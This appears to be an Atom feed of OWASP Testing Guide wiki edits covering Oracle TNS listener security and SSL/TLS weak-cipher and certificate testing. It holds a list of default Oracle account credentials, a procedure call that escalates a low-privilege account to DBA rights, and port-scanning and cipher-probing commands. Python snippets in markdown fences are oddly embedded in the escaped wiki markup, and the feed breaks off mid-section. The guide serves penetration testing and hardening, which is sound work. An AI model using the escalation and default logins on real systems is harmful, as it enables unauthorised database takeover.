<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Katie.mcdowell</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Katie.mcdowell"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Katie.mcdowell"/>
		<updated>2026-05-02T23:29:11Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_DB_Listener_(OWASP-CM-002)&amp;diff=16268</id>
		<title>Testing for DB Listener (OWASP-CM-002)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_DB_Listener_(OWASP-CM-002)&amp;diff=16268"/>
				<updated>2007-02-07T18:39:37Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: Grammar and spelling.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
The database listener is a network daemon unique to Oracle databases. It waits for connection requests from remote clients.&lt;br /&gt;
This daemon can be compromised, and hence the availability of the database can be affected.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
The DB listener is the entry point for remote connections to an Oracle database. It listens for connection requests and handles them accordingly. This test is possible if the tester can access this service -- the test should be done from the Intranet (major Oracle installations don't expose this service to the external network).&lt;br /&gt;
The listener, by default, listens on port 1521 (port 2483 is the new officially registered port for the TNS Listener, and 2484 for the TNS Listener using SSL). It is good practice to change the listener from this port to another arbitrary port number.&lt;br /&gt;
If this listener is &amp;quot;turned off&amp;quot;, remote access to the database is not possible. If this is the case, one's application would also fail, creating a denial of service. &lt;br /&gt;
&lt;br /&gt;
'''Potential areas of attack:'''&lt;br /&gt;
*Stop the Listener -- create a DoS attack.&lt;br /&gt;
*Set a password and prevent others from controlling the Listener - Hijack the DB.&lt;br /&gt;
*Write trace and log files to any file accessible to the process owner of tnslnsr (usually Oracle) - Possible information leakage.&lt;br /&gt;
*Obtain detailed information on the Listener, database, and application configuration.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
Upon discovering the port on which the listener resides, one can assess the listener by running a tool developed by Integrigy:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:Listener_Test.JPG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The tool above checks the following:&lt;br /&gt;
'''Listener Password'''&lt;br /&gt;
On many Oracle systems, the listener password may not be set. The tool above verifies this.&lt;br /&gt;
If the password is not set, an attacker could set the password and hijack the listener, although the password can be removed by locally editing the Listener.ora file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Enable Logging'''&lt;br /&gt;
The tool above also tests to see if logging has been enabled. If it has not, one would not detect any change to the listener or have a record of it. Also, detection of brute force attacks on the listener would not be audited.&lt;br /&gt;
&lt;br /&gt;
'''Admin Restrictions'''&lt;br /&gt;
If Admin restrictions are not enabled, it is possible to use the &amp;quot;SET&amp;quot; commands remotely.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Example'''&lt;br /&gt;
If you find TCP port 1521 open on a server, you may have an Oracle Listener that accepts connections from the outside. If the listener is not protected by an authentication mechanism, or if you can easily find a credential, it is possible to exploit this vulnerability to enumerate the Oracle services. For example, using LSNRCTL(.exe) (contained in every Oracle Client installation), you can obtain the following output:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
TNSLSNR for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
TNS for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Oracle Bequeath NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
SID(s): SERVICE_NAME = CONFDATA&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFDATA&lt;br /&gt;
SID(s): SERVICE_NAME = CONFDATAPDB&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFDATA&lt;br /&gt;
SID(s): SERVICE_NAME = CONFORGANIZ&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFORGANIZ&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Oracle Listener permits the enumeration of default users on the Oracle Server:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
User name	Password&lt;br /&gt;
OUTLN	        OUTLN&lt;br /&gt;
DBSNMP	        DBSNMP&lt;br /&gt;
BACKUP	        BACKUP&lt;br /&gt;
MONITOR	        MONITOR&lt;br /&gt;
PDB	        CHANGE_ON_INSTALL&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case, we have not found privileged DBA accounts, but the OUTLN and BACKUP accounts hold a fundamental privilege: EXECUTE ANY PROCEDURE. This means that it is possible to execute all procedures, for example the following:&lt;br /&gt;
&lt;br /&gt;
 exec dbms_repcat_admin.grant_admin_any_schema('BACKUP');&lt;br /&gt;
&lt;br /&gt;
The execution of this command permits one to obtain DBA privileges. Now the user can interact directly with the DB and execute, for example:&lt;br /&gt;
 &lt;br /&gt;
 select * from session_privs ;&lt;br /&gt;
&lt;br /&gt;
The output is shown in the following screenshot:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:ToadListener2.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The user can now execute many operations, in particular:&lt;br /&gt;
DELETE ANY TABLE &lt;br /&gt;
DROP ANY TABLE.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Listener default ports'''&lt;br /&gt;
During the discovery phase of an Oracle server, one may encounter the following default ports:&lt;br /&gt;
&lt;br /&gt;
 1521: Default port for the TNS Listener. &lt;br /&gt;
 1522 – 1540: Commonly used ports for the TNS Listener&lt;br /&gt;
 1575: Default port for the Oracle Names Server&lt;br /&gt;
 1630: Default port for the Oracle Connection Manager – client connections&lt;br /&gt;
 1830: Default port for the Oracle Connection Manager – admin connections&lt;br /&gt;
 2481: Default port for Oracle JServer/Java VM listener&lt;br /&gt;
 2482: Default port for Oracle JServer/Java VM listener using SSL&lt;br /&gt;
 2483: New port for the TNS Listener&lt;br /&gt;
 2484: New port for the TNS Listener using SSL&lt;br /&gt;
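The list above can be turned into a quick service-discovery sweep. The following is a minimal Python sketch; the helper names tcp_port_open and probe_oracle_ports are illustrative, not part of any standard tool, and in practice a scanner such as nmap is the usual choice:

```python
import socket

# Default Oracle network ports taken from the list above.
ORACLE_PORTS = [1521, 1575, 1630, 1830, 2481, 2482, 2483, 2484]

def tcp_port_open(host, port, timeout=2.0):
    """Return True if a plain TCP connection to host:port succeeds."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        # connect_ex returns 0 on success instead of raising an exception.
        return sock.connect_ex((host, port)) == 0
    finally:
        sock.close()

def probe_oracle_ports(host):
    """Return the subset of default Oracle ports that accept connections."""
    return [p for p in ORACLE_PORTS if tcp_port_open(host, p)]
```

A non-empty result from probe_oracle_ports only says a TCP service is listening there; confirming it is really a TNS Listener still requires a tool such as LSNRCTL or tnscmd.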
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for restriction of the privileges of the listener''':&lt;br /&gt;
It is important to give the listener the least privilege possible, so that it cannot read or write files in the database or in the server memory address space.&lt;br /&gt;
&lt;br /&gt;
The file ''Listener.ora'' is used to define the database listener properties.&lt;br /&gt;
One should check that the following line is present in the Listener.ora file:&lt;br /&gt;
'''ADMIN_RESTRICTIONS_LISTENER=ON'''&lt;br /&gt;
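As a rough illustration, this check can be automated. The sketch below is hedged: the function name admin_restrictions_on is hypothetical, and real Listener.ora syntax is richer than this line-based scan assumes.

```python
def admin_restrictions_on(listener_ora_text, listener_name="LISTENER"):
    """Flag whether ADMIN_RESTRICTIONS_listenername = ON appears in the text.

    Simplifying assumption: the directive sits on a single line; comments
    start with '#'. A production check should use a real Listener.ora parser.
    """
    wanted = "ADMIN_RESTRICTIONS_" + listener_name.upper() + "=ON"
    for raw in listener_ora_text.splitlines():
        # Drop trailing comments, whitespace and case before comparing.
        line = raw.split("#", 1)[0].replace(" ", "").replace("\t", "").upper()
        if line == wanted:
            return True
    return False
```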
&lt;br /&gt;
&lt;br /&gt;
'''Listener password''':&lt;br /&gt;
Many common exploits are performed due to the listener password not being set.&lt;br /&gt;
By checking the Listener.ora file, one can determine if the password is set:&lt;br /&gt;
&lt;br /&gt;
The password can be set manually by editing the Listener.ora file. This is performed by editing the following: PASSWORDS_&amp;lt;listener name&amp;gt;. The issue with this manual method is that the password is stored in cleartext, and can be read by anyone with access to the Listener.ora file.&lt;br /&gt;
A more secure way is to use the LSNRCTL tool and invoke the ''change_password'' command.&lt;br /&gt;
&lt;br /&gt;
 LSNRCTL for 32-bit Windows: Version 9.2.0.1.0 - Production on 24-FEB-2004 11:27:55&lt;br /&gt;
 Copyright (c) 1991, 2002, Oracle Corporation.  All rights reserved.&lt;br /&gt;
 Welcome to LSNRCTL, type &amp;quot;help&amp;quot; for information.&lt;br /&gt;
 LSNRCTL&amp;gt; set current_listener listener&lt;br /&gt;
 Current Listener is listener&lt;br /&gt;
 LSNRCTL&amp;gt; change_password&lt;br /&gt;
 Old password:&lt;br /&gt;
 New password:&lt;br /&gt;
 Reenter new password:&lt;br /&gt;
 Connecting to &amp;lt;ADDRESS&amp;gt;&lt;br /&gt;
 Password changed for listener&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt; set password&lt;br /&gt;
 Password:&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt; save_config&lt;br /&gt;
 Connecting to &amp;lt;ADDRESS&amp;gt;&lt;br /&gt;
 Saved LISTENER configuration parameters.&lt;br /&gt;
 Listener Parameter File   D:\oracle\ora90\network\admin\listener.ora&lt;br /&gt;
 Old Parameter File   D:\oracle\ora90\network\admin\listener.bak&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt;			&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
* Oracle Database Listener Security Guide - http://www.integrigy.com/security-resources/whitepapers/Integrigy_Oracle_Listener_TNS_Security.pdf&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* TNS Listener tool (Perl) - http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html&lt;br /&gt;
* Toad for Oracle - http://www.quest.com/toad&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;br /&gt;
--[[User:Katie.mcdowell|Katie.mcdowell]] 13:39, 7 February 2007 (EST)&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_SSL-TLS_(OWASP-CM-001)&amp;diff=16266</id>
		<title>Testing for SSL-TLS (OWASP-CM-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_SSL-TLS_(OWASP-CM-001)&amp;diff=16266"/>
				<updated>2007-02-07T18:25:44Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: Grammar and spelling.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Due to historic export restrictions on high grade cryptography, both legacy and new web servers may support weak cryptographic options.&lt;br /&gt;
&lt;br /&gt;
Even if high grade ciphers are normally used and installed, some misconfiguration in the server installation could be exploited to force the use of a weaker cipher and gain access to the supposedly secure communication channel. &lt;br /&gt;
&lt;br /&gt;
==Testing SSL / TLS cipher specifications and requirements for site==&lt;br /&gt;
&lt;br /&gt;
The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.&lt;br /&gt;
&lt;br /&gt;
Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.&lt;br /&gt;
&lt;br /&gt;
Technically, cipher determination is performed as follows. In the initial phase of a SSL connection setup, the client sends to the server a Client Hello message specifying, among other information, the cipher suites that it is able to handle. A client is usually a web browser (the most popular SSL client nowadays), but not necessarily, since it can be any SSL-enabled application; the same holds for the server, which need not be a web server, though this is the most common case. (For example, a noteworthy class of SSL clients is that of SSL proxies such as stunnel (www.stunnel.org), which can be used to allow non-SSL enabled tools to talk to SSL services.) A cipher suite is specified by an encryption protocol (DES, RC4, AES), the encryption key length (such as 40, 56, or 128 bits), and a hash algorithm (SHA, MD5) used for integrity checking. Upon receiving a Client Hello message, the server decides which cipher suite it will use for that session. It is possible (for example, by means of configuration directives) to specify which cipher suites the server will honour. In this way you may control, for example, whether or not conversations with clients will support 40-bit encryption only.&lt;br /&gt;
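The client side of this negotiation can be observed with a modern TLS stack. The following Python sketch builds a client context and restricts the suites it would offer in its Client Hello; note that SSLv2 and 40-bit export suites are no longer available in current OpenSSL builds, so this only illustrates the mechanism, not the exact cipher names discussed here.

```python
import ssl

# Build a client context and restrict the cipher suites it will offer in its
# Client Hello; the server then picks one suite from this (reduced) list.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("HIGH:!aNULL:!eNULL:!EXPORT:!RC4:!MD5")

# Names of the suites this context is now willing to negotiate.
offered = [c["name"] for c in ctx.get_ciphers()]
```

A server administrator applies the same idea in reverse, e.g. via Apache's SSLCipherSuite directive, to refuse weak suites no matter what the client offers.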
&lt;br /&gt;
&lt;br /&gt;
===Black Box Test and example===&lt;br /&gt;
&lt;br /&gt;
In order to detect possible support of weak ciphers, the ports associated with SSL/TLS wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS wrapped services related to the web application. In general, a service discovery is required to identify such ports.&lt;br /&gt;
&lt;br /&gt;
The nmap scanner, via the “-sV” scan option, is able to identify SSL services. Vulnerability scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).&lt;br /&gt;
&lt;br /&gt;
'''Example 1'''. SSL service recognition via nmap.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[root@test]# nmap -F -sV localhost&lt;br /&gt;
&lt;br /&gt;
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-27 14:41 CEST&lt;br /&gt;
Interesting ports on localhost.localdomain (127.0.0.1):&lt;br /&gt;
(The 1205 ports scanned but not shown below are in state: closed)&lt;br /&gt;
&lt;br /&gt;
PORT      STATE SERVICE         VERSION&lt;br /&gt;
443/tcp   open  ssl             OpenSSL&lt;br /&gt;
901/tcp   open  http            Samba SWAT administration server&lt;br /&gt;
8080/tcp  open  http            Apache httpd 2.0.54 ((Unix) mod_ssl/2.0.54 OpenSSL/0.9.7g PHP/4.3.11)&lt;br /&gt;
8081/tcp  open  http            Apache Tomcat/Coyote JSP engine 1.0&lt;br /&gt;
&lt;br /&gt;
Nmap run completed -- 1 IP address (1 host up) scanned in 27.881 seconds&lt;br /&gt;
[root@test]# &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example 2'''. Identifying weak ciphers with Nessus.&lt;br /&gt;
The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers (see underlined text).&lt;br /&gt;
&lt;br /&gt;
  '''https (443/tcp)'''&lt;br /&gt;
  '''Description'''&lt;br /&gt;
  Here is the SSLv2 server certificate:&lt;br /&gt;
  Certificate:&lt;br /&gt;
  Data:&lt;br /&gt;
  Version: 3 (0x2)&lt;br /&gt;
  Serial Number: 1 (0x1)&lt;br /&gt;
  Signature Algorithm: md5WithRSAEncryption&lt;br /&gt;
  Issuer: C=**, ST=******, L=******, O=******, OU=******, CN=******&lt;br /&gt;
  Validity&lt;br /&gt;
  Not Before: Oct 17 07:12:16 2002 GMT&lt;br /&gt;
  Not After : Oct 16 07:12:16 2004 GMT&lt;br /&gt;
  Subject: C=**, ST=******, L=******, O=******, CN=******&lt;br /&gt;
  Subject Public Key Info:&lt;br /&gt;
  Public Key Algorithm: rsaEncryption&lt;br /&gt;
  RSA Public Key: (1024 bit)&lt;br /&gt;
  Modulus (1024 bit):&lt;br /&gt;
  00:98:4f:24:16:cb:0f:74:e8:9c:55:ce:62:14:4e:&lt;br /&gt;
  6b:84:c5:81:43:59:c1:2e:ac:ba:af:92:51:f3:0b:&lt;br /&gt;
  ad:e1:4b:22:ba:5a:9a:1e:0f:0b:fb:3d:5d:e6:fc:&lt;br /&gt;
  ef:b8:8c:dc:78:28:97:8b:f0:1f:17:9f:69:3f:0e:&lt;br /&gt;
  72:51:24:1b:9c:3d:85:52:1d:df:da:5a:b8:2e:d2:&lt;br /&gt;
  09:00:76:24:43:bc:08:67:6b:dd:6b:e9:d2:f5:67:&lt;br /&gt;
  e1:90:2a:b4:3b:b4:3c:b3:71:4e:88:08:74:b9:a8:&lt;br /&gt;
  2d:c4:8c:65:93:08:e6:2f:fd:e0:fa:dc:6d:d7:a2:&lt;br /&gt;
  3d:0a:75:26:cf:dc:47:74:29&lt;br /&gt;
  Exponent: 65537 (0x10001)&lt;br /&gt;
  X509v3 extensions:&lt;br /&gt;
  X509v3 Basic Constraints:&lt;br /&gt;
  CA:FALSE&lt;br /&gt;
  Netscape Comment:&lt;br /&gt;
  OpenSSL Generated Certificate&lt;br /&gt;
  Page 10&lt;br /&gt;
  Network Vulnerability Assessment Report 25.05.2005&lt;br /&gt;
  X509v3 Subject Key Identifier:&lt;br /&gt;
  10:00:38:4C:45:F0:7C:E4:C6:A7:A4:E2:C9:F0:E4:2B:A8:F9:63:A8&lt;br /&gt;
  X509v3 Authority Key Identifier:&lt;br /&gt;
  keyid:CE:E5:F9:41:7B:D9:0E:5E:5D:DF:5E:B9:F3:E6:4A:12:19:02:76:CE&lt;br /&gt;
  DirName:/C=**/ST=******/L=******/O=******/OU=******/CN=******&lt;br /&gt;
  serial:00&lt;br /&gt;
  Signature Algorithm: md5WithRSAEncryption&lt;br /&gt;
  7b:14:bd:c7:3c:0c:01:8d:69:91:95:46:5c:e6:1e:25:9b:aa:&lt;br /&gt;
  8b:f5:0d:de:e3:2e:82:1e:68:be:97:3b:39:4a:83:ae:fd:15:&lt;br /&gt;
  2e:50:c8:a7:16:6e:c9:4e:76:cc:fd:69:ae:4f:12:b8:e7:01:&lt;br /&gt;
  b6:58:7e:39:d1:fa:8d:49:bd:ff:6b:a8:dd:ae:83:ed:bc:b2:&lt;br /&gt;
  40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:34:b1:84:97:06:6f:&lt;br /&gt;
  f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:2d:e9:49:60:93:12:&lt;br /&gt;
  0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:6e:e2:fe:e5:07:81:&lt;br /&gt;
  82:fc&lt;br /&gt;
  Here is the list of available SSLv2 ciphers:&lt;br /&gt;
  RC4-MD5&lt;br /&gt;
  EXP-RC4-MD5&lt;br /&gt;
  RC2-CBC-MD5&lt;br /&gt;
  EXP-RC2-CBC-MD5&lt;br /&gt;
  DES-CBC-MD5&lt;br /&gt;
  DES-CBC3-MD5&lt;br /&gt;
  RC4-64-MD5&lt;br /&gt;
  &amp;lt;u&amp;gt;The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and '''2 weak &amp;quot;export class&amp;quot; ciphers'''.&lt;br /&gt;
  The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer a limited protection against a brute force attack&amp;lt;/u&amp;gt;&lt;br /&gt;
  &amp;lt;u&amp;gt;Solution: disable those ciphers and upgrade your client software if necessary.&amp;lt;/u&amp;gt;&lt;br /&gt;
  See http://support.microsoft.com/default.aspx?scid=kben-us216482&lt;br /&gt;
  or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite&lt;br /&gt;
  This SSLv2 server also accepts SSLv3 connections.&lt;br /&gt;
  This SSLv2 server also accepts TLSv1 connections.&lt;br /&gt;
  &lt;br /&gt;
  Vulnerable hosts&lt;br /&gt;
  ''(list of vulnerable hosts follows)''&lt;br /&gt;
&lt;br /&gt;
'''Example 3'''. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[root@test]# openssl s_client -no_tls1 -no_ssl3 -connect www.google.com:443&lt;br /&gt;
CONNECTED(00000003)&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
verify return:1&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=27:certificate not trusted&lt;br /&gt;
verify return:1&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=21:unable to verify the first certificate&lt;br /&gt;
verify return:1&lt;br /&gt;
---&lt;br /&gt;
Server certificate&lt;br /&gt;
-----BEGIN CERTIFICATE-----&lt;br /&gt;
MIIDYzCCAsygAwIBAgIQYFbAC3yUC8RFj9MS7lfBkzANBgkqhkiG9w0BAQQFADCB&lt;br /&gt;
zjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJ&lt;br /&gt;
Q2FwZSBUb3duMR0wGwYDVQQKExRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UE&lt;br /&gt;
CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAxMYVGhh&lt;br /&gt;
d3RlIFByZW1pdW0gU2VydmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNl&lt;br /&gt;
cnZlckB0aGF3dGUuY29tMB4XDTA2MDQyMTAxMDc0NVoXDTA3MDQyMTAxMDc0NVow&lt;br /&gt;
aDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAUBgNVBAcTDU1v&lt;br /&gt;
dW50YWluIFZpZXcxEzARBgNVBAoTCkdvb2dsZSBJbmMxFzAVBgNVBAMTDnd3dy5n&lt;br /&gt;
b29nbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/e2Vs8U33fRDk&lt;br /&gt;
5NNpNgkB1zKw4rqTozmfwty7eTEI8PVH1Bf6nthocQ9d9SgJAI2WOBP4grPj7MqO&lt;br /&gt;
dXMTFWGDfiTnwes16G7NZlyh6peT68r7ifrwSsVLisJp6pUf31M5Z3D88b+Yy4PE&lt;br /&gt;
D7BJaTxq6NNmP1vYUJeXsGSGrV6FUQIDAQABo4GmMIGjMB0GA1UdJQQWMBQGCCsG&lt;br /&gt;
AQUFBwMBBggrBgEFBQcDAjBABgNVHR8EOTA3MDWgM6Axhi9odHRwOi8vY3JsLnRo&lt;br /&gt;
YXd0ZS5jb20vVGhhd3RlUHJlbWl1bVNlcnZlckNBLmNybDAyBggrBgEFBQcBAQQm&lt;br /&gt;
MCQwIgYIKwYBBQUHMAGGFmh0dHA6Ly9vY3NwLnRoYXd0ZS5jb20wDAYDVR0TAQH/&lt;br /&gt;
BAIwADANBgkqhkiG9w0BAQQFAAOBgQADlTbBdVY6LD1nHWkhTadmzuWq2rWE0KO3&lt;br /&gt;
Ay+7EleYWPOo+EST315QLpU6pQgblgobGoI5x/fUg2U8WiYj1I1cbavhX2h1hda3&lt;br /&gt;
FJWnB3SiXaiuDTsGxQ267EwCVWD5bCrSWa64ilSJTgiUmzAv0a2W8YHXdG08+nYc&lt;br /&gt;
X/dVk5WRTw==&lt;br /&gt;
-----END CERTIFICATE-----&lt;br /&gt;
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
issuer=/C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/emailAddress=premium-server@thawte.com&lt;br /&gt;
---&lt;br /&gt;
No client certificate CA names sent&lt;br /&gt;
---&lt;br /&gt;
Ciphers common between both SSL endpoints:&lt;br /&gt;
RC4-MD5         EXP-RC4-MD5     RC2-CBC-MD5&lt;br /&gt;
EXP-RC2-CBC-MD5 DES-CBC-MD5     DES-CBC3-MD5&lt;br /&gt;
RC4-64-MD5&lt;br /&gt;
---&lt;br /&gt;
SSL handshake has read 1023 bytes and written 333 bytes&lt;br /&gt;
---&lt;br /&gt;
New, SSLv2, Cipher is DES-CBC3-MD5&lt;br /&gt;
Server public key is 1024 bit&lt;br /&gt;
Compression: NONE&lt;br /&gt;
Expansion: NONE&lt;br /&gt;
SSL-Session:&lt;br /&gt;
    Protocol  : SSLv2&lt;br /&gt;
    Cipher    : DES-CBC3-MD5&lt;br /&gt;
    Session-ID: 709F48E4D567C70A2E49886E4C697CDE&lt;br /&gt;
    Session-ID-ctx:&lt;br /&gt;
    Master-Key: 649E68F8CF936E69642286AC40A80F433602E3C36FD288C3&lt;br /&gt;
    Key-Arg   : E8CB6FEB9ECF3033&lt;br /&gt;
    Start Time: 1156977226&lt;br /&gt;
    Timeout   : 300 (sec)&lt;br /&gt;
    Verify return code: 21 (unable to verify the first certificate)&lt;br /&gt;
---&lt;br /&gt;
closed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===White Box Test and example===&lt;br /&gt;
&lt;br /&gt;
Check the configuration of the web servers which provide https services. If the web application provides other SSL/TLS wrapped services, these should be checked as well.&lt;br /&gt;
&lt;br /&gt;
'''Example:''' The following registry path in Windows Server 2003 defines the ciphers available to the server:&lt;br /&gt;
&lt;br /&gt;
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\&lt;br /&gt;
&lt;br /&gt;
==Testing SSL certificate validity – client and server==&lt;br /&gt;
&lt;br /&gt;
When accessing a web application via the https protocol, a secure channel is established between the client (usually the browser) and the server. The identity of one (the server) or both parties (client and server) is then established by means of digital certificates. In order for the communication to be set up, a number of checks on the certificates must be passed. While discussing SSL and certificate-based authentication is beyond the scope of this Guide, we will focus on the main criteria involved in ascertaining certificate validity: a) checking if the Certificate Authority (CA) is a known one (meaning one considered trusted), b) checking that the certificate is currently valid, and c) checking that the name of the site and the name reported in the certificate match.&lt;br /&gt;
&lt;br /&gt;
Let’s examine each check more in detail.&lt;br /&gt;
&lt;br /&gt;
a) Each browser comes with a preloaded list of trusted CAs, against which the certificate signing CA is compared (this list can be customized and expanded at will). During the initial negotiations with an https server, if the server certificate relates to a CA unknown to the browser, a warning is usually raised. This happens most often because a web application relies on a certificate signed by a self-established CA. Whether this is to be considered a concern depends on several factors. For example, this may be fine for an Intranet environment (think of corporate web email being provided via https; here, obviously all users recognize the internal CA as a trusted CA). When a service is provided to the general public via the Internet, however (i.e. when it is important to positively verify the identity of the server we are talking to), it is usually imperative to rely on a trusted CA, one which is recognized by all the user base (and here we stop with our considerations; we won’t delve deeper into the implications of the trust model being used by digital certificates).&lt;br /&gt;
&lt;br /&gt;
b) Certificates have an associated period of validity, therefore they may expire. Again, we are warned by the browser about this. A public service needs a temporally valid certificate; otherwise, it means we are talking with a server whose certificate was issued by someone we trust, but has expired without being renewed.&lt;br /&gt;
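This temporal check can be sketched programmatically. The helper names below are illustrative, and the sketch assumes the certificate's "Not After" field has already been extracted (Python's ssl module accepts the textual form shown in the Nessus excerpt above):

```python
import ssl
import time

def seconds_until_expiry(not_after):
    """not_after is the certificate's 'Not After' field,
    e.g. 'Oct 16 07:12:16 2004 GMT'."""
    expiry = ssl.cert_time_to_seconds(not_after)
    return expiry - time.time()

def is_expired(not_after):
    # Negative remaining time means the validity period has passed.
    return max(seconds_until_expiry(not_after), 0.0) == 0.0
```

For instance, the 2004 expiry date in the sample certificate above would be flagged as expired.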
&lt;br /&gt;
